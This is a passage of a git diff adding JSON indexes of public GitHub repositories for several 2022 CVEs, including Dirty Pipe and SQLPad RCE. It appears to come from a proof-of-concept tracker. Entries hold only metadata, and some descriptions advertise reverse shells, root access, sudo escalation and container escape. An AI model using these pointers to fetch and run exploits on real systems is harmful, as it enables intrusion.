"pushed_at": "2022-10-12T18:27:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 566904700, + "name": "ps-lab-cve-2022-0847", + "full_name": "Turzum\/ps-lab-cve-2022-0847", + "owner": { + "login": "Turzum", + "id": 103773518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103773518?v=4", + "html_url": "https:\/\/github.com\/Turzum", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Turzum\/ps-lab-cve-2022-0847", + "description": "Resources required for building Pluralsight CVE-2022-0847 lab", + "fork": false, + "created_at": "2022-11-16T16:57:14Z", + "updated_at": "2023-01-19T21:51:23Z", + "pushed_at": "2023-01-19T21:27:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 568592373, + "name": "linux-", + "full_name": "qwert419\/linux-", + "owner": { + "login": "qwert419", + "id": 70561497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70561497?v=4", + "html_url": "https:\/\/github.com\/qwert419", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qwert419\/linux-", + "description": "修改版CVE-2022-0847", + "fork": false, + "created_at": "2022-11-21T01:21:35Z", + "updated_at": "2024-05-15T06:21:19Z", + "pushed_at": "2022-11-21T01:24:59Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 580862925, + "name": "CVE-2022-0847", + "full_name": "DataFox\/CVE-2022-0847", + "owner": { + "login": "DataFox", + "id": 28943022, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28943022?v=4", + "html_url": "https:\/\/github.com\/DataFox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DataFox\/CVE-2022-0847", + "description": "CVE-2022-0847", + "fork": false, + "created_at": "2022-12-21T16:34:18Z", + "updated_at": "2022-12-21T16:56:38Z", + "pushed_at": "2022-12-21T16:56:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 583717581, + "name": "Dirty-Pipe-CVE-2022-0847", + "full_name": "pmihsan\/Dirty-Pipe-CVE-2022-0847", + "owner": { + "login": "pmihsan", + "id": 89512452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89512452?v=4", + "html_url": "https:\/\/github.com\/pmihsan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pmihsan\/Dirty-Pipe-CVE-2022-0847", + "description": "Dirty Pipe Kernel Vulnerability Exploit", + "fork": false, + "created_at": "2022-12-30T17:17:44Z", + "updated_at": "2023-07-24T10:30:49Z", + "pushed_at": "2022-12-30T17:33:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "c", + "cve-2022-0847", + "dirty-pipe", + "exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 585137919, + "name": "Dirty-Pipe-CVE-2022-0847-POCs", + "full_name": "ajith737\/Dirty-Pipe-CVE-2022-0847-POCs", + "owner": { + "login": "ajith737", + "id": 72512571, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72512571?v=4", + "html_url": "https:\/\/github.com\/ajith737", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ajith737\/Dirty-Pipe-CVE-2022-0847-POCs", + "description": null, + "fork": false, + "created_at": "2023-01-04T12:17:12Z", + "updated_at": "2023-01-04T12:17:19Z", + "pushed_at": "2023-01-04T12:51:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 592661297, + "name": "CVE-2022-0847", + "full_name": "mutur4\/CVE-2022-0847", + "owner": { + "login": "mutur4", + "id": 68686790, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68686790?v=4", + "html_url": "https:\/\/github.com\/mutur4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mutur4\/CVE-2022-0847", + "description": "Drity Pipe Linux Kernel 1-Day Exploit", + "fork": false, + "created_at": "2023-01-24T08:44:32Z", + "updated_at": "2024-02-10T19:14:45Z", + "pushed_at": "2023-09-06T12:28:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 606665321, + "name": "CVE-2022-0847-DirtyPipe-Exploits", + "full_name": "orsuprasad\/CVE-2022-0847-DirtyPipe-Exploits", + "owner": { + "login": "orsuprasad", + "id": 96675141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96675141?v=4", + "html_url": "https:\/\/github.com\/orsuprasad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orsuprasad\/CVE-2022-0847-DirtyPipe-Exploits", + "description": null, + "fork": false, + "created_at": "2023-02-26T07:08:36Z", + "updated_at": "2023-02-26T07:09:46Z", + "pushed_at": "2023-02-26T07:09:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 632960690, + "name": "CVE-2022-0847-container-escape", + "full_name": "JlSakuya\/CVE-2022-0847-container-escape", + "owner": { + "login": "JlSakuya", + "id": 43692131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43692131?v=4", + "html_url": "https:\/\/github.com\/JlSakuya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JlSakuya\/CVE-2022-0847-container-escape", + "description": "A simple exploit that uses dirtypipe to inject shellcode into runC entrypoint to implement container escapes.", + "fork": false, + "created_at": "2023-04-26T13:37:14Z", + "updated_at": "2023-04-29T08:25:41Z", + "pushed_at": "2023-04-26T13:38:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634694393, + "name": "cve-2022-0847", + "full_name": "jonathanbest7\/cve-2022-0847", + "owner": { + "login": "jonathanbest7", + "id": 91819614, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91819614?v=4", + "html_url": "https:\/\/github.com\/jonathanbest7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jonathanbest7\/cve-2022-0847", + "description": "check cve-2022-0847", + "fork": false, + "created_at": "2023-04-30T23:52:14Z", + "updated_at": "2023-04-30T23:52:15Z", + "pushed_at": "2023-04-30T23:52:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656422987, + "name": "dirty-pipe-poc", + "full_name": "0xeremus\/dirty-pipe-poc", + "owner": { + "login": "0xeremus", + "id": 115777776, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115777776?v=4", + "html_url": "https:\/\/github.com\/0xeremus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xeremus\/dirty-pipe-poc", + "description": "POC Exploit to add user to Sudo for CVE-2022-0847 Dirty Pipe Vulnerability", + "fork": false, + "created_at": "2023-06-20T23:48:24Z", + "updated_at": "2023-11-30T12:04:32Z", + "pushed_at": "2023-06-20T23:48:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 662828842, + "name": "CVE-2022-0847-eBPF", + "full_name": "h4ckm310n\/CVE-2022-0847-eBPF", + "owner": { + "login": "h4ckm310n", + "id": 10968322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10968322?v=4", + "html_url": "https:\/\/github.com\/h4ckm310n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4ckm310n\/CVE-2022-0847-eBPF", + "description": "An eBPF program to detect attacks on CVE-2022-0847", + "fork": false, + "created_at": "2023-07-06T01:31:01Z", + "updated_at": "2024-07-03T22:01:24Z", + "pushed_at": "2023-11-04T15:49:51Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 664412775, + "name": "CVE-2022-0847-Exploit-Implementation", + "full_name": "joeymeech\/CVE-2022-0847-Exploit-Implementation", + "owner": { + "login": "joeymeech", + "id": 32067575, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32067575?v=4", + "html_url": "https:\/\/github.com\/joeymeech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joeymeech\/CVE-2022-0847-Exploit-Implementation", + "description": "Using CVE-2022-0847, \"Dirty Pipe Exploit\", to pop a reverse bash shell for arbitrary code execution on a foreign machine.", + "fork": false, + "created_at": "2023-07-09T22:48:22Z", + "updated_at": "2024-06-21T10:50:51Z", + "pushed_at": "2023-07-11T02:02:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 692738777, + "name": "DirtyPipe", + "full_name": "pashayogi\/DirtyPipe", + "owner": { + "login": "pashayogi", + "id": 50790111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50790111?v=4", + "html_url": "https:\/\/github.com\/pashayogi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pashayogi\/DirtyPipe", + "description": "CVE: CVE-2022-0847", + "fork": false, + "created_at": "2023-09-17T12:43:52Z", + "updated_at": "2024-07-16T13:10:31Z", + "pushed_at": "2023-09-17T12:44:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 705367804, + "name": "DirtyPipe", + "full_name": "n3rada\/DirtyPipe", + "owner": { + "login": "n3rada", + "id": 72791564, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72791564?v=4", + "html_url": "https:\/\/github.com\/n3rada", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rada\/DirtyPipe", + "description": "Working Dirty Pipe (CVE-2022-0847) exploit tool with root access and file overwrites.", + "fork": false, + "created_at": "2023-10-15T20:13:11Z", + "updated_at": "2024-11-20T17:53:47Z", + "pushed_at": "2023-10-15T22:23:44Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0847", + "dirty-pipe", + "kernel-exploit", + "pentesting", + "unix" + ], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709775288, + "name": "CVE-2022-0847-dirty-pipe-checker", + "full_name": "ayushx007\/CVE-2022-0847-dirty-pipe-checker", + "owner": { + "login": "ayushx007", + "id": 113995024, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113995024?v=4", + "html_url": "https:\/\/github.com\/ayushx007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ayushx007\/CVE-2022-0847-dirty-pipe-checker", + "description": "Bash script to check if kernel is vulnerable ", + "fork": false, + "created_at": "2023-10-25T11:28:22Z", + "updated_at": "2023-10-25T11:29:25Z", + "pushed_at": "2023-10-25T11:29:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 714682173, + "name": "CVE-2022-0847-DirtyPipe-Exploits", + "full_name": "ayushx007\/CVE-2022-0847-DirtyPipe-Exploits", + "owner": { + "login": "ayushx007", + "id": 113995024, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113995024?v=4", + "html_url": "https:\/\/github.com\/ayushx007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ayushx007\/CVE-2022-0847-DirtyPipe-Exploits", + "description": null, + "fork": false, + "created_at": "2023-11-05T15:34:54Z", + "updated_at": "2023-11-05T15:35:50Z", + "pushed_at": "2023-11-05T15:35:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736712600, + "name": "LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus", + "full_name": "solomon12354\/LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus", + "owner": { + "login": "solomon12354", + "id": 84257391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84257391?v=4", + "html_url": "https:\/\/github.com\/solomon12354", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/solomon12354\/LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus", + "description": null, + "fork": false, + "created_at": "2023-12-28T16:52:42Z", + "updated_at": "2024-07-13T01:50:03Z", + "pushed_at": "2024-05-27T16:41:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 757803327, + "name": "CVE-2022-0847", + "full_name": "letsr00t\/CVE-2022-0847", + "owner": { + "login": "letsr00t", + "id": 38699989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38699989?v=4", + "html_url": "https:\/\/github.com\/letsr00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/letsr00t\/CVE-2022-0847", + "description": null, + "fork": false, + "created_at": "2024-02-15T02:27:27Z", + "updated_at": "2024-02-15T02:28:36Z", + "pushed_at": "2024-02-15T02:28:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 794413658, + "name": "CVE-2022-0847", + "full_name": "xsxtw\/CVE-2022-0847", + "owner": { + "login": "xsxtw", + "id": 168295718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168295718?v=4", + "html_url": "https:\/\/github.com\/xsxtw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xsxtw\/CVE-2022-0847", + "description": null, + "fork": false, + "created_at": "2024-05-01T05:16:16Z", + "updated_at": "2024-05-01T05:18:06Z", + "pushed_at": "2024-05-01T05:18:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810324570, + "name": "CVE-2022-0847-dirty-pipe-checker", + "full_name": "muhammad1596\/CVE-2022-0847-dirty-pipe-checker", + "owner": { + "login": "muhammad1596", + "id": 68430129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68430129?v=4", + "html_url": "https:\/\/github.com\/muhammad1596", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/muhammad1596\/CVE-2022-0847-dirty-pipe-checker", + "description": null, + "fork": false, + "created_at": "2024-06-04T13:25:04Z", + "updated_at": "2024-06-04T16:18:38Z", + "pushed_at": "2024-06-04T16:07:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811402709, + "name": "CVE-2022-0847-DirtyPipe-Exploits", + "full_name": "muhammad1596\/CVE-2022-0847-DirtyPipe-Exploits", + "owner": { + "login": "muhammad1596", + "id": 68430129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68430129?v=4", + "html_url": "https:\/\/github.com\/muhammad1596", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/muhammad1596\/CVE-2022-0847-DirtyPipe-Exploits", + "description": null, + "fork": false, + "created_at": "2024-06-06T14:27:41Z", + "updated_at": "2024-06-06T14:39:21Z", + "pushed_at": "2024-06-06T14:39:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0848.json b/2022/CVE-2022-0848.json new file mode 100644 index 0000000000..0cd9c0b414 --- /dev/null +++ b/2022/CVE-2022-0848.json @@ -0,0 +1,64 @@ +[ + { + "id": 468650717, + "name": "CVE-2022-0848", + "full_name": "dskmehra\/CVE-2022-0848", + "owner": { + "login": "dskmehra", + "id": 18103236, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18103236?v=4", + "html_url": "https:\/\/github.com\/dskmehra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dskmehra\/CVE-2022-0848", + "description": null, + "fork": false, + "created_at": "2022-03-11T07:26:04Z", + "updated_at": "2023-07-06T22:02:34Z", + "pushed_at": "2022-03-11T07:29:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 514188117, + "name": "CVE-2022-0848-RCE", + "full_name": "Lay0us\/CVE-2022-0848-RCE", + "owner": { + "login": "Lay0us", + "id": 99304369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99304369?v=4", + "html_url": "https:\/\/github.com\/Lay0us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lay0us\/CVE-2022-0848-RCE", + "description": null, + "fork": false, + "created_at": "2022-07-15T08:10:38Z", + "updated_at": "2023-07-06T22:02:41Z", + "pushed_at": "2022-07-15T06:29:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0853.json b/2022/CVE-2022-0853.json new file mode 100644 index 0000000000..f29d338f82 --- /dev/null +++ b/2022/CVE-2022-0853.json @@ -0,0 +1,33 @@ +[ + { + "id": 468269355, + "name": "CVE-2022-0853", + "full_name": "ByteHackr\/CVE-2022-0853", + "owner": { + "login": "ByteHackr", + "id": 30409831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30409831?v=4", + "html_url": "https:\/\/github.com\/ByteHackr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ByteHackr\/CVE-2022-0853", + "description": null, + "fork": false, + "created_at": "2022-03-10T09:10:56Z", + "updated_at": "2024-08-12T20:21:26Z", + "pushed_at": "2022-03-12T14:31:08Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0918.json b/2022/CVE-2022-0918.json new file mode 100644 index 0000000000..ec67ec8062 --- /dev/null +++ b/2022/CVE-2022-0918.json @@ -0,0 +1,33 @@ +[ + { + "id": 490532996, + "name": "CVE-2022-0918", + "full_name": "NathanMulbrook\/CVE-2022-0918", + "owner": { + "login": "NathanMulbrook", + "id": 36544452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36544452?v=4", + "html_url": "https:\/\/github.com\/NathanMulbrook", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NathanMulbrook\/CVE-2022-0918", + "description": "CVE-2022-0918", + "fork": false, + "created_at": "2022-05-10T03:50:18Z", + "updated_at": "2024-05-06T03:37:35Z", + "pushed_at": "2022-05-13T17:28:20Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0944.json b/2022/CVE-2022-0944.json new file mode 100644 index 0000000000..dc25e3289d --- /dev/null +++ b/2022/CVE-2022-0944.json @@ -0,0 +1,252 @@ +[ + { + "id": 854311848, + "name": "CVE-2022-0944", + "full_name": "shhrew\/CVE-2022-0944", + "owner": { + "login": "shhrew", + "id": 179271961, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179271961?v=4", + "html_url": "https:\/\/github.com\/shhrew", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shhrew\/CVE-2022-0944", + "description": "A proof of concept exploit for SQLPad RCE (CVE-2022-0944).", + "fork": false, + "created_at": "2024-09-08T23:39:24Z", + "updated_at": "2024-10-26T18:00:04Z", + "pushed_at": "2024-09-08T23:57:27Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854473439, + "name": "CVE-2022-0944_RCE_Automation", + "full_name": "Philip-Otter\/CVE-2022-0944_RCE_Automation", + "owner": { + "login": "Philip-Otter", + "id": 78989650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78989650?v=4", + "html_url": "https:\/\/github.com\/Philip-Otter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Philip-Otter\/CVE-2022-0944_RCE_Automation", + "description": "PoC code written for CVE-2022-0944 to make exploitation easier. Based on information found here: https:\/\/huntr.com\/bounties\/46630727-d923-4444-a421-537ecd63e7fb", + "fork": false, + "created_at": "2024-09-09T08:33:17Z", + "updated_at": "2024-09-10T17:01:28Z", + "pushed_at": "2024-09-10T17:01:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854781649, + "name": "CVE-2022-0944", + "full_name": "FlojBoj\/CVE-2022-0944", + "owner": { + "login": "FlojBoj", + "id": 170850781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170850781?v=4", + "html_url": "https:\/\/github.com\/FlojBoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FlojBoj\/CVE-2022-0944", + "description": "SQLPad - Template injection (POC exploit for SQLPad RCE [CVE-2022-0944])", + "fork": false, + "created_at": "2024-09-09T19:09:43Z", + "updated_at": "2024-11-20T02:17:10Z", + "pushed_at": "2024-09-10T14:23:01Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855111543, + "name": "sqlpad-rce-exploit-CVE-2022-0944", + "full_name": "0xRoqeeb\/sqlpad-rce-exploit-CVE-2022-0944", + "owner": { + "login": "0xRoqeeb", + "id": 49154037, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49154037?v=4", + "html_url": "https:\/\/github.com\/0xRoqeeb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xRoqeeb\/sqlpad-rce-exploit-CVE-2022-0944", + "description": null, + "fork": false, + "created_at": "2024-09-10T10:26:57Z", + "updated_at": "2024-11-25T00:33:32Z", + "pushed_at": "2024-09-10T16:18:40Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856828078, + "name": "CVE-2022-0944_RCE_POC", + "full_name": "Robocopsita\/CVE-2022-0944_RCE_POC", + "owner": { + "login": "Robocopsita", + "id": 181462171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/181462171?v=4", + "html_url": "https:\/\/github.com\/Robocopsita", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Robocopsita\/CVE-2022-0944_RCE_POC", + "description": null, + "fork": false, + "created_at": "2024-09-13T09:30:08Z", + "updated_at": "2024-09-27T11:59:56Z", + "pushed_at": "2024-09-13T09:44:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872147587, + "name": "CVE-2022-0944", + "full_name": "toneillcodes\/CVE-2022-0944", + "owner": { + "login": "toneillcodes", + "id": 148013535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148013535?v=4", + "html_url": "https:\/\/github.com\/toneillcodes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/toneillcodes\/CVE-2022-0944", + "description": "PoC for RCE in SQLPad (CVE-2022-0944)", + "fork": false, + "created_at": "2024-10-13T22:34:09Z", + "updated_at": "2024-10-14T14:08:05Z", + "pushed_at": "2024-10-14T14:08:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cybersecurity" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 878669450, + "name": "SQLPad-RCE-Exploit-CVE-2022-0944", + "full_name": "LipeOzyy\/SQLPad-RCE-Exploit-CVE-2022-0944", + "owner": { + "login": "LipeOzyy", + "id": 151560338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151560338?v=4", + "html_url": "https:\/\/github.com\/LipeOzyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LipeOzyy\/SQLPad-RCE-Exploit-CVE-2022-0944", + "description": "CVE-2022-0944 Remote Code Execution Exploit", + "fork": false, + "created_at": "2024-10-25T20:31:09Z", + "updated_at": "2024-11-08T00:22:54Z", + "pushed_at": "2024-10-26T14:04:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 879408778, + "name": "SQLPad-6.10.0-Exploit-CVE-2022-0944", + "full_name": "0xDTC\/SQLPad-6.10.0-Exploit-CVE-2022-0944", + "owner": { + "login": "0xDTC", + "id": 95960398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95960398?v=4", + "html_url": "https:\/\/github.com\/0xDTC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDTC\/SQLPad-6.10.0-Exploit-CVE-2022-0944", + "description": "Refurbish", + "fork": false, + "created_at": "2024-10-27T20:26:47Z", + "updated_at": "2024-10-27T20:27:51Z", + "pushed_at": "2024-10-27T20:27:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": 